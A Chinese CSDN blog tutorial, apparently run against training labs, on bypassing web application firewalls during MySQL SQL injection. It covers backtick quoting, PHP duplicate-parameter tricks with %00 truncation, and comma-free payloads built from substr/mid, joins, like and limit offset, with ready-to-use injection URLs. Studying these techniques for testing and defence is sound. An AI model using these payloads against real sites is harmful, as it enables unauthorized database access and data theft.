SQL 注入绕过(二)

最新推荐文章于 2023-07-25 11:40:06 发布
最新推荐文章于 2023-07-25 11:40:06 发布
阅读量830 收藏 1
点赞数 1
分类专栏: OWASP TOP10 文章标签: mysql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51730169/article/details/125436180
版权

一、反引号绕过

在 mysql 可以使用 `这里是反引号` 绕过一些 waf 拦截。字段可以加反引号或者不加,意义相同。
insert into users(username,password,email)values('test','123456','admin@test.com');
insert into users(`username`,`password`,`email`)values('test','123456','admin@test.com');

\N'union distinct select 1,(select version() from `users` limit 1)--+&submit=1

在这里插入图片描述

二、脚本语言特性绕过

1、介绍

在 php 语言中,id=1&id=2 后面的值会自动覆盖前面的值,不同的语言有不同的特性。可以利用这点绕过一些 waf 的拦截。
id=1%00&id=2 union select 1,2,3
有些 waf 会去匹配第一个 id 参数1%00%00 是截断字符,waf 会自动截断 从而不会检测后面的内容。到了程序中,id 就等于 id=2 union select 1,2,3 从绕过注入拦截。
其他语言特性

在这里插入图片描述

2、实操1

在这里插入图片描述
在这里插入图片描述

3、实操2

?name=vince%00&name=' union select 1,database()--+&submit=1

在这里插入图片描述

三、逗号绕过

目前有些防注入脚本都会逗号进行拦截,例如常规注入中必须包含逗号。
select * from users where id=1 union select 1,2,3,4;
一般会对逗号过滤成空,select * from users where id=1 union select 1 2 3 4;这样SQL 语句就会出错。所以,可以不使用逗号进行 SQL 注入。
绕过方法如下:

1、第一种方式:substr 截取字符串

查询当前库第一个字符:
select(substr(database() from 1 for 1)); 
查询 p 等于 select(substr(database() from 1 for 1)),页面返回正常。
select * from users where id=1 and 'p'=(select(substr(database() from 1 for 1)));
可以进一步优化 m 换成 hex 0x6D,这样就避免了单引号。
select * from users where id=1 and 0x70=(select(substr(database() from 1 for 1)));

在这里插入图片描述

?name=vince' and (select(substr(database() from 1 for 1)))='p'--+&submit=1
?name=vince' and (select(substr(database() from 1 for 1)))='x'--+&submit=1

在这里插入图片描述
在这里插入图片描述

2、第二种方式:mid 截取字符串

这个 min 函数跟 substr 函数功能相同,如果 substr 函数被拦截或者过滤可以使用这个函数代替。
select (mid(database() from 1 for 1)); 
select * from users where id=1 and 'p'=(select(mid(database() from 1 for 1)));
select * from users where id=1 and 0x70=(select(mid(database() from 1 for 1)));

在这里插入图片描述

3、第三种方式: 使用 join 绕过

使用 join 自连接两个表:
union select 1,2 #等价于 union select * from (select 1)a join (select 2)b,其中a 和 b 分别是表的别名。
select * from users where id=-1 union select 1,2,3,4;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select 3)c join(select 4)d;
select * from users where id=-1 union select * from (select 1)a join (select 2)b
join(select user())c join(select 4)d;
这里也没有使用逗号,从而绕过 waf 对逗号的拦截。

在这里插入图片描述

4、第四种方式:like 绕过

使用 like 模糊查询 select user() like '%r%'; 模糊查询成功返回 1,否则返回 0
找到第一个字符后继续进行下一个字符匹配。从而找到所有的字符串,最后就是要查询的内容,这种 SQL 注入语句也不会存在逗号。从而绕过 waf 拦截。

在这里插入图片描述

5、第五种方式:limit offset 绕过

SQL 注入时,如果需要限定条目可以使用 limit 0,1 限定返回条目的数目,limit 0,1 返回条一条记录。如果对逗号进行拦截时,可以使用 limit 1 默认返回第一条数据。也可以使用 limit 1 offset 0 从零开始返回第一条记录,这样就绕过 waf 拦截。

在这里插入图片描述

Aτθ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
MySQL-限制结果-LIMIT(limit)
weixin_46858088的博客
12-15 3596
示例1 SQL语句 SELECT 姓名 FROM xsda LIMIT 7 语义 该语句使用SELECT语句检索单个列(xsda表中的姓名列) ,LIMIT 7 表示数据库返回5行数据(可以少于7行) 结果 实例2 但上面那种方式只能从第一行开始检索,LIMIT还有另一种用法 SQL语句 SELECT 姓名 FROM xsda LIMIT 5,3 语义 LIMIT 5,3 表示数据库返回从行5开始的3行. 第一个数为检索的开始位置 第个数为检索的函数 结
ORDER BY LIMIT 0,1意思
过客的博客
12-14 3万+
limit 0,1, 从你的表中的第0个数据开始,只读取一个;
SQL优化之LIMIT语法, limit n,m 和 limit n有什么区别?
qq_41899174的博客
04-20 1万+
​​ 在某些面试题中会遇到这样的问答或笔试题:“limit 0,1 和 limit 1有什么区别?” 要准确回答这个问题就等深入明白limit一个参数和两个参数的本质区别。 limit n,m 中的第一次参数n表示的游标的偏移量,初始值为0,第个参数m表示的是想要获取多少条数据。所以limit 0,1表示的是从第一条记录开始,只取一条即可。limit 1表示的也是只取...
mysqllimit 用法
Jay_Fighting的专栏
05-16 894
<br />mysql支持limit select * from tablename limit 0,1 即取出第一条记录 select * from tablename limit 1,1 第条记录 select * from tablename limit 10,20 从第11条到31条(共计20条)
sql语句中limit、offset的用法
热门推荐
belief_009的博客
03-16 4万+
sql语句中limit和offset的用法
SQL注入绕过实战案例
最新发布
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入SQL Injection)是...
SQL注入绕过的技巧总结
09-09
本文主要探讨了三种SQL注入绕过技术:引号绕过、逗号绕过以及比较符(<, >)绕过,这些都是在SQL注入措施下仍能实施攻击的有效手段。 首先,**引号绕过** 是针对那些过滤了单引号(')或双引号(")的系统。...
sql注入绕过技术1
08-03
根据给定的信息,我们可以深入探讨SQL注入绕过的几种方法及其背后的原理。这将涵盖十六进制编码、Unicode编码、各种注释技术以及如何利用特定的符号和函数来绕过Web应用防火墙(WAF)。 ### 一、十六进制编码 十六...
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
sqllimit 用法
Leon的专栏
08-14 1105
sql 语句 最后加上 limit 即可,几种用法 limit n,m n 表示起始位置 m 表示共取多少个 几个例子limit 0,1 从最开始取一个 limit 1 只取一个,与上面意义相同 limit 10,20 取的是 第11~30个,共20
sqli-labs
weixin_52385170的博客
07-20 661
sqli-labs
SQLlimit的作用
become a programmer
03-26 2841
看别人的代码看到了limit的使用,然后搜一搜整理一下 1.例如sql语句:select * from table limit 1,10 表示的意思是显示第1条记录到第10条记录。 2.例如sql语句:select * from table limit 3,10 表示的意思是显示第3条记录到第10条记录。 3.例如sql语句:select * from tab
CTFweb篇-SQL注入(四)
weixin_44597701的博客
08-17 462
Less11 这一关主要就是改post请求,用post请求的参数来进行注入 填写admin登陆后仍然没有get参数 考虑就是post请求 这里就用burp suite抓包 这里就是post传入的参数值,改的就是这个值 我们把这个值拿到hackbar里面来进行操作 我们传入uname=admin’,系统会报错 right syntax to use near 'admin' LIMIT 0,1' at line 1 我们再传uname=admin",就没有报错了 证明这里是双单引号包裹 于是传入uname
mysql+limit+sql注入_sql注入limit注入和五种时间盲注姿势
weixin_28803437的博客
01-19 650
0x00前言limit注入和时间前面也提过一点点了,真的非常简单,真不太想单独写一个这个来水博客。。这里还是记录一下吧以后忘了方便复习。0x01 limit基础知识照抄前面的:这里简单记录一下我自己经常会忘的知识点,觉得不值得再写一篇博客去水了233使用查询语句的时候,经常要使用limit返回前几条或者中间某几行数据SELECT*FROMtableLIMIT[offset,]rows...
019 - limit
weixin_47481102的博客
07-25 174
有两个参数,第一个参数指定要返回的第一行的偏移量,第个参数指定要返回的最大行数。limit:限制返回结果数量;该LIMIT子句可用于约束。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值